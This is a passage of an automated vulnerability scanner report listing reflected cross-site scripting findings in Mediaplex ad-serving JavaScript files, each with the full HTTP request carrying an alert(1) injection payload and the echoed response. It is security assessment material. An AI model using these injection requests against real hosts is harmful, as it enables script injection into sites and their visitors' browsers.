The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef8a0"%3balert(1)//e019e9b34cb was submitted in the mpck parameter. This input was echoed as ef8a0";alert(1)//e019e9b34cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_Shorts.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Ddfacd378ae01495cb1afdea6641ee6c3ef8a0"%3balert(1)//e019e9b34cb&mpt=dfacd378ae01495cb1afdea6641ee6c3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=4c330d2e129f4a6b8e771853ec86bef6__bk=lmvvy3__id=52f13r67ouwsmw70yd08fug5k__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228987905&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:14:33 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:23:40 GMT
ETag: "3d3e19-f19-4a3f16132af00"
Accept-Ranges: bytes
Content-Length: 7782
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
_zoneid=12268__UTLCA=1__cb=4c330d2e129f4a6b8e771853ec86bef6__bk=lmvvy3__id=52f13r67ouwsmw70yd08fug5k__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-10?mpt=dfacd378ae01495cb1afdea6641ee6c3ef8a0";alert(1)//e019e9b34cb\" target=\"_blank\">
...[SNIP]...

3.96. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_Shorts.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d06b2"%3balert(1)//97d04dba135 was submitted in the mpt parameter. This input was echoed as d06b2";alert(1)//97d04dba135 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_Shorts.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Ddfacd378ae01495cb1afdea6641ee6c3&mpt=dfacd378ae01495cb1afdea6641ee6c3d06b2"%3balert(1)//97d04dba135&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=4c330d2e129f4a6b8e771853ec86bef6__bk=lmvvy3__id=52f13r67ouwsmw70yd08fug5k__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228987905&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:14:43 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:23:40 GMT
ETag: "3d3e19-f19-4a3f16132af00"
Accept-Ranges: bytes
Content-Length: 7394
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7567122/7567122/'+ st +'/[SiteName]/dfacd378ae01495cb1afdea6641ee6c3d06b2";alert(1)//97d04dba135';
   w_adldspsend(mcdt);

3.97. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Hurley_300x250_Male_Shorts.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af02f"%3balert(1)//dab747b70f7 was submitted in the mpvc parameter. This input was echoed as af02f";alert(1)//dab747b70f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Hurley_300x250_Male_Shorts.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Ddfacd378ae01495cb1afdea6641ee6c3&mpt=dfacd378ae01495cb1afdea6641ee6c3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=4c330d2e129f4a6b8e771853ec86bef6__bk=lmvvy3__id=52f13r67ouwsmw70yd08fug5k__oadest=af02f"%3balert(1)//dab747b70f7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308228987905&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:03 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:23:40 GMT
ETag: "3d3e19-f19-4a3f16132af00"
Accept-Ranges: bytes
Content-Length: 7730
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__UTLCA=1__cb=4c330d2e129f4a6b8e771853ec86bef6__bk=lmvvy3__id=52f13r67ouwsmw70yd08fug5k__oadest=af02f";alert(1)//dab747b70f7http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-10%3Fmpt%3Ddfacd378ae01495cb1afdea6641ee6c3&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215473__campaignid=38112__zoneid=12268__U
...[SNIP]...

3.98. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/RD_728x90_Male_Fleece.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ea9"%3balert(1)//2e1febdca18 was submitted in the mpck parameter. This input was echoed as 28ea9";alert(1)//2e1febdca18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/RD_728x90_Male_Fleece.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-7%3Fmpt%3Df324888c8c3b4af39140a4e1393fe16328ea9"%3balert(1)//2e1febdca18&mpt=f324888c8c3b4af39140a4e1393fe163&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215483__campaignid=38114__zoneid=12267__UTLCA=1__cb=415f6b227a2e4a219d19ae0b26819f88__bk=lmvv88__id=b12qqb2w639w5unyw5wglaftp__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228056641&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:00 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:26:06 GMT
ETag: "63101c-efd-4a2e029e39f80"
Accept-Ranges: bytes
Content-Length: 7740
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
__zoneid=12267__UTLCA=1__cb=415f6b227a2e4a219d19ae0b26819f88__bk=lmvv88__id=b12qqb2w639w5unyw5wglaftp__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-7?mpt=f324888c8c3b4af39140a4e1393fe16328ea9";alert(1)//2e1febdca18\" target=\"_blank\">
...[SNIP]...

3.99. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/RD_728x90_Male_Fleece.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 349c0"%3balert(1)//282272c8067 was submitted in the mpt parameter. This input was echoed as 349c0";alert(1)//282272c8067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/RD_728x90_Male_Fleece.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-7%3Fmpt%3Df324888c8c3b4af39140a4e1393fe163&mpt=f324888c8c3b4af39140a4e1393fe163349c0"%3balert(1)//282272c8067&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215483__campaignid=38114__zoneid=12267__UTLCA=1__cb=415f6b227a2e4a219d19ae0b26819f88__bk=lmvv88__id=b12qqb2w639w5unyw5wglaftp__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228056641&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:11 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:26:06 GMT
ETag: "63101c-efd-4a2e029e39f80"
Accept-Ranges: bytes
Content-Length: 7352
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7496706/7496706/'+ st +'/[SiteName]/f324888c8c3b4af39140a4e1393fe163349c0";alert(1)//282272c8067';
   w_adldspsend(mcdt);

3.100. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/RD_728x90_Male_Fleece.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c19e"%3balert(1)//bc42202c70d was submitted in the mpvc parameter. This input was echoed as 6c19e";alert(1)//bc42202c70d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/RD_728x90_Male_Fleece.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-7%3Fmpt%3Df324888c8c3b4af39140a4e1393fe163&mpt=f324888c8c3b4af39140a4e1393fe163&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215483__campaignid=38114__zoneid=12267__UTLCA=1__cb=415f6b227a2e4a219d19ae0b26819f88__bk=lmvv88__id=b12qqb2w639w5unyw5wglaftp__oadest=6c19e"%3balert(1)//bc42202c70d HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228056641&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:13:30 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 23:26:06 GMT
ETag: "63101c-efd-4a2e029e39f80"
Accept-Ranges: bytes
Content-Length: 7688
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215483__campaignid=38114__zoneid=12267__UTLCA=1__cb=415f6b227a2e4a219d19ae0b26819f88__bk=lmvv88__id=b12qqb2w639w5unyw5wglaftp__oadest=6c19e";alert(1)//bc42202c70dhttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-7%3Fmpt%3Df324888c8c3b4af39140a4e1393fe163&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215483__campaignid=38114__zoneid=12267__UT
...[SNIP]...

3.101. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_300x250_Female_Butt.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487b"%3balert(1)//b9921bdf949 was submitted in the mpck parameter. This input was echoed as 4487b";alert(1)//b9921bdf949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_300x250_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3D9a36b0eb2e824df4b1933c7ab98d3bf04487b"%3balert(1)//b9921bdf949&mpt=9a36b0eb2e824df4b1933c7ab98d3bf0&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215478__campaignid=38114__zoneid=12268__UTLCA=1__cb=75cfbefc195747b5aac007ba017021bd__bk=lmvw6o__id=mrhkx8fpyrd7vy2b082uwyrh__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308229297364&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:24 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:03:21 GMT
ETag: "525a21-f0f-4a2d923ea4040"
Accept-Ranges: bytes
Content-Length: 7745
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
4__zoneid=12268__UTLCA=1__cb=75cfbefc195747b5aac007ba017021bd__bk=lmvw6o__id=mrhkx8fpyrd7vy2b082uwyrh__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-2?mpt=9a36b0eb2e824df4b1933c7ab98d3bf04487b";alert(1)//b9921bdf949\" target=\"_blank\">
...[SNIP]...

3.102. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_300x250_Female_Butt.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34d04"%3balert(1)//761ce8950cf was submitted in the mpt parameter. This input was echoed as 34d04";alert(1)//761ce8950cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_300x250_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3D9a36b0eb2e824df4b1933c7ab98d3bf0&mpt=9a36b0eb2e824df4b1933c7ab98d3bf034d04"%3balert(1)//761ce8950cf&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215478__campaignid=38114__zoneid=12268__UTLCA=1__cb=75cfbefc195747b5aac007ba017021bd__bk=lmvw6o__id=mrhkx8fpyrd7vy2b082uwyrh__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308229297364&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:35 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:03:21 GMT
ETag: "525a21-f0f-4a2d923ea4040"
Accept-Ranges: bytes
Content-Length: 7357
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7488923/7488923/'+ st +'/[SiteName]/9a36b0eb2e824df4b1933c7ab98d3bf034d04";alert(1)//761ce8950cf';
   w_adldspsend(mcdt);

3.103. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_300x250_Female_Butt.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f548f"%3balert(1)//db5863a6956 was submitted in the mpvc parameter. This input was echoed as f548f";alert(1)//db5863a6956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_300x250_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3D9a36b0eb2e824df4b1933c7ab98d3bf0&mpt=9a36b0eb2e824df4b1933c7ab98d3bf0&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215478__campaignid=38114__zoneid=12268__UTLCA=1__cb=75cfbefc195747b5aac007ba017021bd__bk=lmvw6o__id=mrhkx8fpyrd7vy2b082uwyrh__oadest=f548f"%3balert(1)//db5863a6956 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308229297364&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:55 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:03:21 GMT
ETag: "525a21-f0f-4a2d923ea4040"
Accept-Ranges: bytes
Content-Length: 7693
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
\" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215478__campaignid=38114__zoneid=12268__UTLCA=1__cb=75cfbefc195747b5aac007ba017021bd__bk=lmvw6o__id=mrhkx8fpyrd7vy2b082uwyrh__oadest=f548f";alert(1)//db5863a6956http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-2%3Fmpt%3D9a36b0eb2e824df4b1933c7ab98d3bf0&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215478__campaignid=38114__zoneid=12268__UT
...[SNIP]...

3.104. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b05c"%3balert(1)//9a18e004762 was submitted in the mpck parameter. This input was echoed as 3b05c";alert(1)//9a18e004762 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3Def1aa41386ba465cbce6f2b77f4d87613b05c"%3balert(1)//9a18e004762&mpt=ef1aa41386ba465cbce6f2b77f4d8761&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215477__campaignid=38114__zoneid=12267__UTLCA=1__cb=ddf17e17b581479ab0e43f55c6cf9b33__bk=lmvw6o__id=a9vbfmzny4mdhvaqsl5odbidj__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229295898&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:24 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 7760
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
__zoneid=12267__UTLCA=1__cb=ddf17e17b581479ab0e43f55c6cf9b33__bk=lmvw6o__id=a9vbfmzny4mdhvaqsl5odbidj__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-1?mpt=ef1aa41386ba465cbce6f2b77f4d87613b05c";alert(1)//9a18e004762\" target=\"_blank\">
...[SNIP]...

3.105. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fd38"%3balert(1)//9d42522fa9d was submitted in the mpt parameter. This input was echoed as 1fd38";alert(1)//9d42522fa9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

